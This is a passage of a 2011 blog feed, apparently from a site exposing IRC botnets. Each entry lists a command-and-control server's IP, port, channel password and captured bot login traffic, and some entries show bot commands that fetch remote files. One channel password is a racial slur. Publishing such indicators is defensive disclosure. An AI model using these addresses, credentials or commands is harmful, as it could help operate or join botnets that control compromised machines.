href='http://www.exposedbotnets.com/2011/12/20877223114irc-botnet-hosted-in-united.html' title='208.77.223.114(irc botnet hosted in United States Arlington Texas Pulmonary &amp; Critical Care Consultants Pa )'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4967384452602337069</id><published>2011-12-10T01:10:00.000+01:00</published><updated>2011-12-10T01:10:39.542+01:00</updated><title type='text'>69.64.79.210(irc botnet hosted in United States Codero)</title><content type='html'>Remote Host Port Number&lt;br /&gt;69.64.79.210 6667 PASS \google_cache2.tmp&lt;br /&gt;&lt;br /&gt;NICK New[custom-XP-USA]763897&lt;br /&gt;USER 7638 "" "TsGh" :7638&lt;br /&gt;PONG :974C3BFC&lt;br /&gt;JOIN #icry 9977&lt;br /&gt;PONG :irc.foonet.com&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/69.64.79.210&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4967384452602337069?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4967384452602337069/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/696479210irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4967384452602337069'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4967384452602337069'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/696479210irc-botnet-hosted-in-united.html' title='69.64.79.210(irc botnet hosted in United States Codero)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8283218313947155126</id><published>2011-12-09T17:31:00.000+01:00</published><updated>2011-12-09T17:31:00.661+01:00</updated><title type='text'>77.79.13.207(irc botnet hosted in Lithuania Siauliai Splius Uab)</title><content type='html'>Remote Host Port Number&lt;br /&gt;62.219.11.91 80&lt;br /&gt;&lt;br /&gt;72.32.8.40 80&lt;br /&gt;&lt;br /&gt;77.79.13.207 1337 PASS aa&lt;br /&gt;&lt;br /&gt;NOTICE [CAN][XP][66567] :STAYALIVE&lt;br /&gt;NICK [CAN][XP][66567]&lt;br /&gt;USER Surreal 8 * :Endless&lt;br /&gt;JOIN #modz aa&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/77.79.13.207&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8283218313947155126?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8283218313947155126/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/777913207irc-botnet-hosted-in-lithuania.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8283218313947155126'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8283218313947155126'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/777913207irc-botnet-hosted-in-lithuania.html' title='77.79.13.207(irc botnet hosted in Lithuania Siauliai Splius Uab)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4189296766846434227</id><published>2011-12-09T17:24:00.000+01:00</published><updated>2011-12-09T17:24:56.684+01:00</updated><title type='text'>91.121.96.162(ngrBot hosted in France Ovh Systems)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;&lt;br /&gt;91.121.96.162 6667 PASS fumete&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}jgwfngz&lt;br /&gt;USER jgwfngz 0 0 :jgwfngz&lt;br /&gt;JOIN #bote fumete&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/91.121.96.162&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4189296766846434227?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4189296766846434227/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/9112196162ngrbot-hosted-in-france-ovh.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4189296766846434227'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4189296766846434227'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/9112196162ngrbot-hosted-in-france-ovh.html' title='91.121.96.162(ngrBot hosted in France Ovh Systems)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4370831983364177546</id><published>2011-12-08T14:04:00.000+01:00</published><updated>2011-12-08T14:04:19.601+01:00</updated><title type='text'>95.143.193.118(irc botnet hosted in Sweden Hudiksvall Serverconnect Sweden Ab)</title><content type='html'>Remote Host Port Number&lt;br /&gt;178.17.164.202 80&lt;br /&gt;95.143.193.118 80&lt;br /&gt;&lt;br /&gt;NICK qeoieyjx&lt;br /&gt;USER a&lt;br /&gt;PONG :i.&lt;br /&gt;NICK jldmoscu&lt;br /&gt;USER x&lt;br /&gt;&lt;br /&gt;020501 . . :#00c&lt;br /&gt;00000010 | 6431 6134 3038 2053 6572 7669 6365 2050 | d1a408 Service P&lt;br /&gt;00000020 | 6163 6B20 320A 4A4F 494E 2023 2E33 3634 | ack 2.JOIN #.364&lt;br /&gt;00000030 | 0A30 3230 3530 3120 2E20 2E20 3A23 3030 | .020501 . . :#00&lt;br /&gt;00000040 | 6364 3161 3430 3820 5365 7276 6963 6520 | cd1a408 Service&lt;br /&gt;00000050 | 5061 636B 2032 0A4A 4F49 4E20 232E 3336 | Pack 2.JOIN #.36&lt;br /&gt;00000060 | 340A                                    | 4.&lt;br /&gt;&lt;br /&gt;    * The data identified by the following URL was then requested from the remote web server:&lt;br /&gt;          o http://vetvetcom.com/tr9.txt&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/95.143.193.118&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4370831983364177546?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4370831983364177546/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/95143193118irc-botnet-hosted-in-sweden.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4370831983364177546'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4370831983364177546'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/95143193118irc-botnet-hosted-in-sweden.html' title='95.143.193.118(irc botnet hosted in Sweden Hudiksvall Serverconnect Sweden Ab)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2125643444662221876</id><published>2011-12-08T13:47:00.000+01:00</published><updated>2011-12-08T13:47:14.943+01:00</updated><title type='text'>31.210.114.150(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;31.210.114.150 6667 PASS KCA&lt;br /&gt;&lt;br /&gt;NICK A[US-XPC]zrkwbnf&lt;br /&gt;USER zrkwbnf 0 0 :zrkwbnf&lt;br /&gt;JOIN #KCA KCA&lt;br /&gt;JOIN #X&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/31.210.114.150&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2125643444662221876?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/2125643444662221876/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/31210114150irc-botnet-hosted-in-turkey.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2125643444662221876'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2125643444662221876'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/31210114150irc-botnet-hosted-in-turkey.html' title='31.210.114.150(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-6151647389473980075</id><published>2011-12-07T23:52:00.000+01:00</published><updated>2011-12-07T23:52:42.013+01:00</updated><title type='text'>213.155.7.33(ngrBot  hosted in Ukraine  Poltava  Tehnologii Budushego Llc)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;213.155.7.33 2009 PASS ngrbot&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}jitkqnc&lt;br /&gt;USER jitkqnc 0 0 :jitkqnc&lt;br /&gt;JOIN #juaz ngrBot&lt;br /&gt;&lt;br /&gt;Now talking in #juaz&lt;br /&gt;Topic On: [ #juaz ]&lt;br /&gt;Topic By: [ o0o ]&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/213.155.7.33&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-6151647389473980075?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/6151647389473980075/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/213155733ngrbot-hosted-in-ukraine.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6151647389473980075'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/6151647389473980075'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/213155733ngrbot-hosted-in-ukraine.html' title='213.155.7.33(ngrBot  hosted in Ukraine  Poltava  Tehnologii Budushego Llc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-9171423066359250661</id><published>2011-12-07T21:33:00.002+01:00</published><updated>2011-12-07T21:33:51.941+01:00</updated><title type='text'>31.186.102.180(ngrBot hosted in Russian Federation Selectel Ltd)</title><content type='html'>Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;31.186.102.180 1863 PASS ngrBot&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}kyhrsdo&lt;br /&gt;USER kyhrsdo 0 0 :kyhrsdo&lt;br /&gt;JOIN #IrcPeru PeruRulz!!&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/31.186.102.180&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-9171423066359250661?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/9171423066359250661/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/31186102180ngrbot-hosted-in-russian.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/9171423066359250661'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/9171423066359250661'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/31186102180ngrbot-hosted-in-russian.html' title='31.186.102.180(ngrBot hosted in Russian Federation Selectel Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-559377320699518675</id><published>2011-12-07T21:18:00.002+01:00</published><updated>2011-12-07T21:18:51.144+01:00</updated><title type='text'>31.210.47.236(irc botnet hosted in Turkey Hosting Internet Hizmetleri Ltd Sti)</title><content type='html'>Remote Host Port Number&lt;br /&gt;31.210.47.236 6667&lt;br /&gt;&lt;br /&gt;NICK new[iRooT-XP-USA]465072&lt;br /&gt;USER 4650 "" "TsGh" :4650&lt;br /&gt;JOIN #abece WTF&lt;br /&gt;PONG :HTTP1.4&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/31.210.47.236&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-559377320699518675?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/559377320699518675/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/3121047236irc-botnet-hosted-in-turkey.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/559377320699518675'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/559377320699518675'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/3121047236irc-botnet-hosted-in-turkey.html' title='31.210.47.236(irc botnet hosted in Turkey Hosting Internet Hizmetleri Ltd Sti)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-898197781491714546</id><published>2011-12-07T20:34:00.004+01:00</published><updated>2011-12-08T00:34:35.491+01:00</updated><title type='text'>xpozure12345.info(irc Aryan bot hosted in Germany  Gunzenhausen  Hetzner Online Ag)</title><content type='html'>Resolved : [xpozure12345.info]To [178.63.122.253]&lt;br /&gt;&lt;br /&gt;Remote Host Port Number&lt;br /&gt;178.63.122.253 6667 PASS none&lt;br /&gt;199.15.234.7 80&lt;br /&gt;&lt;br /&gt;NICK New{US-XP-x86}8543563&lt;br /&gt;USER 8543563 "" "8543563" :8543563&lt;br /&gt;MODE New{US-XP-x86}8543563 +iMm&lt;br /&gt;JOIN #Aryan none&lt;br /&gt;PONG :XPOZURE.GOV&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/178.63.122.253&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-898197781491714546?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/898197781491714546/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/17863122253irc-aryan-bot-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/898197781491714546'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/898197781491714546'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/17863122253irc-aryan-bot-hosted-in.html' title='xpozure12345.info(irc Aryan bot hosted in Germany  Gunzenhausen  Hetzner Online Ag)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-274646534802325714</id><published>2011-12-07T19:19:00.002+01:00</published><updated>2011-12-07T19:19:38.709+01:00</updated><title type='text'>208.77.218.154(irc botnet hosted in United States  Florida Webmaster Corp)</title><content type='html'>Remote Host Port Number&lt;br /&gt;208.77.218.154 2345&lt;br /&gt;&lt;br /&gt;NICK New[USA|00|P|29500]&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Disabled.&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.&lt;br /&gt;USER XP-0409 * 0 :COMPUTERNAME&lt;br /&gt;MODE New[USA|00|P|29500] -ix&lt;br /&gt;JOIN #!loco!&lt;br /&gt;PONG 22 MOTD&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/208.77.218.154&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-274646534802325714?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/274646534802325714/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/20877218154irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/274646534802325714'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/274646534802325714'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/20877218154irc-botnet-hosted-in-united.html' title='208.77.218.154(irc botnet hosted in United States  Florida Webmaster Corp)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8756528939080535597</id><published>2011-12-06T17:47:00.000+01:00</published><updated>2011-12-06T17:47:14.727+01:00</updated><title type='text'>173.252.248.152(ngrBot hosted in United States  Santa Clara  Take 2 Hosting Inc)</title><content type='html'>Remote Host Port Number&lt;br /&gt;173.252.248.152 5236 PASS ROCKR&lt;br /&gt;199.15.234.7 80&lt;br /&gt;206.193.204.35 80&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}ltphyjg&lt;br /&gt;USER ltphyjg 0 0 :ltphyjg&lt;br /&gt;JOIN #ROCK ngrBot&lt;br /&gt;PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 17 domain(s)&lt;br /&gt;&lt;br /&gt;Now talking in #ROCK&lt;br /&gt;Topic On: [ #ROCK ] [ ,mdns http://www.alemanarts.com//wp-includes/js/doma.txt ]&lt;br /&gt;Topic By: [ rockstar ]&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/173.252.248.152&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8756528939080535597?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8756528939080535597/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/173252248152ngrbot-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8756528939080535597'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8756528939080535597'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/173252248152ngrbot-hosted-in-united.html' title='173.252.248.152(ngrBot hosted in United States  Santa Clara  Take 2 Hosting Inc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8201632381646462249</id><published>2011-12-06T12:24:00.000+01:00</published><updated>2011-12-06T12:24:28.042+01:00</updated><title type='text'>46.166.144.145(irc botnet hosted in France  Santrex Internet Services Ltd)</title><content type='html'>Remote Host Port Number&lt;br /&gt;216.146.38.70 80&lt;br /&gt;72.233.89.200 80&lt;br /&gt;46.166.144.145 2109&lt;br /&gt;&lt;br /&gt;NICK {iNF-00-USA-XP-COMP-5850}&lt;br /&gt;JOIN #hold nigger&lt;br /&gt;PONG Beast.net&lt;br /&gt;USER blaze * 0 :COMP&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/46.166.144.145&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8201632381646462249?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8201632381646462249/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/46166144145irc-botnet-hosted-in-france.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8201632381646462249'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8201632381646462249'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/46166144145irc-botnet-hosted-in-france.html' title='46.166.144.145(irc botnet hosted in France  Santrex Internet Services Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-3153568851525222608</id><published>2011-12-06T12:20:00.000+01:00</published><updated>2011-12-06T12:20:06.477+01:00</updated><title type='text'>scans.no-ip.org(irc botnet hosted in Chile  Exe Ingenera)</title><content type='html'>Remote Host Port Number&lt;br /&gt;200.55.208.196 21161&lt;br /&gt;&lt;br /&gt;NICK raGe|lmLsfSBCBu&lt;br /&gt;USER xxwiml "fo9.net" "rage" :xxwiml&lt;br /&gt;JOIN #rage rage&lt;br /&gt;PONG irc.priv8net.com&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/200.55.208.196&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-3153568851525222608?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/3153568851525222608/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/scansno-iporgirc-botnet-hosted-in-chile.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3153568851525222608'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/3153568851525222608'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/scansno-iporgirc-botnet-hosted-in-chile.html' title='scans.no-ip.org(irc botnet hosted in Chile  Exe Ingenera)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4565826599755760313</id><published>2011-12-05T21:34:00.000+01:00</published><updated>2011-12-05T21:34:32.416+01:00</updated><title type='text'>64.151.111.140(irc botnet hosted in United States  Gogrid Llc)</title><content type='html'>Remote Host Port Number&lt;br /&gt;64.151.111.140 4042&lt;br /&gt;&lt;br /&gt;NICK new[USA|XP|COMPUTERNAME]pzpmjiu&lt;br /&gt;USER xd "" "lol" :xd&lt;br /&gt;JOIN #newbiz#&lt;br /&gt;&lt;br /&gt;Now talking in #newbiz#&lt;br /&gt;Topic On: [ #newbiz# ] [ ]&lt;br /&gt;Topic By: [ b ]&lt;br /&gt;Modes On: [ #newbiz# ] [ +smntu ]&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/64.151.111.140&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4565826599755760313?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4565826599755760313/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/64151111140irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4565826599755760313'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4565826599755760313'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/64151111140irc-botnet-hosted-in-united.html' title='64.151.111.140(irc botnet hosted in United States  Gogrid Llc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' 